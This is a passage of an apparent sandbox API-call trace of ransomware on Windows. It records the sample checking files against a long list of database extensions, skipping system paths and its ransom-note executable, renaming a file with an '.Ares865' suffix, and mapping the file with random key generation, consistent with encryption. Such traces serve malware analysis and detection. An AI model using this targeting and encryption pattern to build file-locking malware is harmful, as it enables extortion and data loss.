returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.407] lstrlenW (lpString="vhd") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.407] lstrlenW (lpString="vhdx") returned 4 [0088.407] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.407] lstrlenW (lpString="avhd") returned 4 [0088.407] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.407] lstrlenW (lpString="db") returned 2 [0088.407] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.407] lstrlenW (lpString="db2") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.407] lstrlenW (lpString="db3") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.407] lstrlenW (lpString="dbf") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.407] lstrlenW (lpString="mdf") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.407] lstrlenW (lpString="mdb") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.407] lstrlenW (lpString="sql") returned 3 [0088.407] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.407] lstrlenW (lpString="sqlite") returned 6 [0088.407] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.407] lstrlenW (lpString="sqlite3") returned 7 [0088.408] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.408] lstrlenW (lpString="sqlitedb") returned 8 [0088.408] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.408] lstrlenW (lpString="xml") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.408] lstrlenW (lpString="$er") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.408] lstrlenW (lpString="4dd") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.408] lstrlenW (lpString="4dl") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.408] lstrlenW (lpString="^^^") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.408] lstrlenW (lpString="abs") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.408] lstrlenW (lpString="abx") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.408] lstrlenW (lpString="accdb") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.408] lstrlenW (lpString="accdc") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.408] lstrlenW (lpString="accde") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.408] lstrlenW (lpString="accdr") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.408] lstrlenW (lpString="accdt") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.408] lstrlenW (lpString="accdw") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.408] lstrlenW (lpString="accft") returned 5 [0088.408] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.408] lstrlenW (lpString="adb") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.408] lstrlenW (lpString="adb") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.408] lstrlenW (lpString="ade") returned 3 [0088.408] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.408] lstrlenW (lpString="adf") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.409] lstrlenW (lpString="adn") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.409] lstrlenW (lpString="adp") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.409] lstrlenW (lpString="alf") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.409] lstrlenW (lpString="ask") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.409] lstrlenW (lpString="btr") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.409] lstrlenW (lpString="cat") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.409] lstrlenW (lpString="cdb") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.409] lstrlenW (lpString="ckp") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.409] lstrlenW (lpString="cma") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.409] lstrlenW (lpString="cpd") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.409] lstrlenW (lpString="dacpac") returned 6 [0088.409] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.409] lstrlenW (lpString="dad") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.409] lstrlenW (lpString="dadiagrams") returned 10 [0088.409] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.409] lstrlenW (lpString="daschema") returned 8 [0088.409] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.409] lstrlenW (lpString="db-journal") returned 10 [0088.409] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.409] lstrlenW (lpString="db-shm") returned 6 [0088.409] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.409] lstrlenW (lpString="db-wal") returned 6 [0088.409] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.409] lstrlenW (lpString="dbc") returned 3 [0088.409] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.410] lstrlenW (lpString="dbs") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.410] lstrlenW (lpString="dbt") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.410] lstrlenW (lpString="dbv") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.410] lstrlenW (lpString="dbx") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.410] lstrlenW (lpString="dcb") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.410] lstrlenW (lpString="dct") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.410] lstrlenW (lpString="dcx") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.410] lstrlenW (lpString="ddl") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.410] lstrlenW (lpString="dlis") returned 4 [0088.410] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.410] lstrlenW (lpString="dp1") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.410] lstrlenW (lpString="dqy") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.410] lstrlenW (lpString="dsk") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.410] lstrlenW (lpString="dsn") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.410] lstrlenW (lpString="dtsx") returned 4 [0088.410] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.410] lstrlenW (lpString="dxl") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.410] lstrlenW (lpString="eco") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.410] lstrlenW (lpString="ecx") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.410] lstrlenW (lpString="edb") returned 3 [0088.410] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.410] lstrlenW (lpString="epim") returned 4 [0088.410] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.411] lstrlenW (lpString="fcd") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.411] lstrlenW (lpString="fdb") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.411] lstrlenW (lpString="fic") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.411] lstrlenW (lpString="flexolibrary") returned 12 [0088.411] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.411] lstrlenW (lpString="fm5") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.411] lstrlenW (lpString="fmp") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.411] lstrlenW (lpString="fmp12") returned 5 [0088.411] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.411] lstrlenW (lpString="fmpsl") returned 5 [0088.411] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.411] lstrlenW (lpString="fol") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.411] lstrlenW (lpString="fp3") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.411] lstrlenW (lpString="fp4") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.411] lstrlenW (lpString="fp5") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.411] lstrlenW (lpString="fp7") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.411] lstrlenW (lpString="fpt") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.411] lstrlenW (lpString="frm") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.411] lstrlenW (lpString="gdb") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.411] lstrlenW (lpString="gdb") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.411] lstrlenW (lpString="grdb") returned 4 [0088.411] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.411] lstrlenW (lpString="gwi") returned 3 [0088.411] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.412] lstrlenW (lpString="hdb") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.412] lstrlenW (lpString="his") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.412] lstrlenW (lpString="ib") returned 2 [0088.412] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.412] lstrlenW (lpString="idb") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.412] lstrlenW (lpString="ihx") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.412] lstrlenW (lpString="itdb") returned 4 [0088.412] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.412] lstrlenW (lpString="itw") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.412] lstrlenW (lpString="jet") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.412] lstrlenW (lpString="jtx") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.412] lstrlenW (lpString="kdb") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.412] lstrlenW (lpString="kexi") returned 4 [0088.412] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.412] lstrlenW (lpString="kexic") returned 5 [0088.412] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.412] lstrlenW (lpString="kexis") returned 5 [0088.412] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.412] lstrlenW (lpString="lgc") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.412] lstrlenW (lpString="lwx") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.412] lstrlenW (lpString="maf") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.412] lstrlenW (lpString="maq") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.412] lstrlenW (lpString="mar") returned 3 [0088.412] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.412] lstrlenW (lpString="marshal") returned 7 [0088.412] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.413] lstrlenW (lpString="mas") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.413] lstrlenW (lpString="mav") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.413] lstrlenW (lpString="maw") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.413] lstrlenW (lpString="mdbhtml") returned 7 [0088.413] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.413] lstrlenW (lpString="mdn") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.413] lstrlenW (lpString="mdt") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.413] lstrlenW (lpString="mfd") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.413] lstrlenW (lpString="mpd") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.413] lstrlenW (lpString="mrg") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.413] lstrlenW (lpString="mud") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.413] lstrlenW (lpString="mwb") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.413] lstrlenW (lpString="myd") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.413] lstrlenW (lpString="ndf") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.413] lstrlenW (lpString="nnt") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.413] lstrlenW (lpString="nrmlib") returned 6 [0088.413] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.413] lstrlenW (lpString="ns2") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.413] lstrlenW (lpString="ns3") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.413] lstrlenW (lpString="ns4") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.413] lstrlenW (lpString="nsf") returned 3 [0088.413] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.414] lstrlenW (lpString="nv") returned 2 [0088.414] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.414] lstrlenW (lpString="nv2") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.414] lstrlenW (lpString="nwdb") returned 4 [0088.414] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.414] lstrlenW (lpString="nyf") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.414] lstrlenW (lpString="odb") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.414] lstrlenW (lpString="odb") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.414] lstrlenW (lpString="oqy") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.414] lstrlenW (lpString="ora") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.414] lstrlenW (lpString="orx") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.414] lstrlenW (lpString="owc") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.414] lstrlenW (lpString="p96") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.414] lstrlenW (lpString="p97") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.414] lstrlenW (lpString="pan") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.414] lstrlenW (lpString="pdb") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.414] lstrlenW (lpString="pdm") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.414] lstrlenW (lpString="pnz") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.414] lstrlenW (lpString="qry") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.414] lstrlenW (lpString="qvd") returned 3 [0088.414] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.414] lstrlenW (lpString="rbf") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.415] lstrlenW (lpString="rctd") returned 4 [0088.415] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.415] lstrlenW (lpString="rod") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.415] lstrlenW (lpString="rodx") returned 4 [0088.415] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.415] lstrlenW (lpString="rpd") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.415] lstrlenW (lpString="rsd") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.415] lstrlenW (lpString="sas7bdat") returned 8 [0088.415] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.415] lstrlenW (lpString="sbf") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.415] lstrlenW (lpString="scx") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.415] lstrlenW (lpString="sdb") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.415] lstrlenW (lpString="sdc") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.415] lstrlenW (lpString="sdf") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.415] lstrlenW (lpString="sis") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.415] lstrlenW (lpString="spq") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.415] lstrlenW (lpString="te") returned 2 [0088.415] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.415] lstrlenW (lpString="teacher") returned 7 [0088.415] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.415] lstrlenW (lpString="tmd") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.415] lstrlenW (lpString="tps") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.415] lstrlenW (lpString="trc") returned 3 [0088.415] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.416] lstrlenW (lpString="trc") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.416] lstrlenW (lpString="trm") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.416] lstrlenW (lpString="udb") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.416] lstrlenW (lpString="udl") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.416] lstrlenW (lpString="usr") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.416] lstrlenW (lpString="v12") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.416] lstrlenW (lpString="vis") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.416] lstrlenW (lpString="vpd") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.416] lstrlenW (lpString="vvv") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.416] lstrlenW (lpString="wdb") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.416] lstrlenW (lpString="wmdb") returned 4 [0088.416] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.416] lstrlenW (lpString="wrk") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.416] lstrlenW (lpString="xdb") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.416] lstrlenW (lpString="xld") returned 3 [0088.416] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.416] lstrlenW (lpString="xmlff") returned 5 [0088.416] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.416] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.Ares865") returned 80 [0088.416] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.417] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26976) returned 1 [0088.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.418] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.419] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c60, lpName=0x0) returned 0x15c [0088.420] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c60) returned 0x190000 [0088.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.423] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.423] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.424] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.424] CloseHandle (hObject=0x15c) returned 1 [0088.424] CloseHandle (hObject=0x118) returned 1 [0088.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.424] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.424] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a315700, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a315700, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x77560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0088.424] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.424] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="..") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="windows") returned -1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="temp") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="boot") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.425] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.425] lstrlenW (lpString="VISINTL.DLL.trx_dll") returned 19 [0088.425] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0088.425] lstrcpyW (in: lpString1=0x2cce468, lpString2="VISINTL.DLL.trx_dll" | out: lpString1="VISINTL.DLL.trx_dll") returned="VISINTL.DLL.trx_dll" [0088.425] lstrlenW (lpString="VISINTL.DLL.trx_dll") returned 19 [0088.425] lstrlenW (lpString="Ares865") returned 7 [0088.425] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.425] lstrlenW (lpString=".dll") returned 4 [0088.425] lstrcmpiW 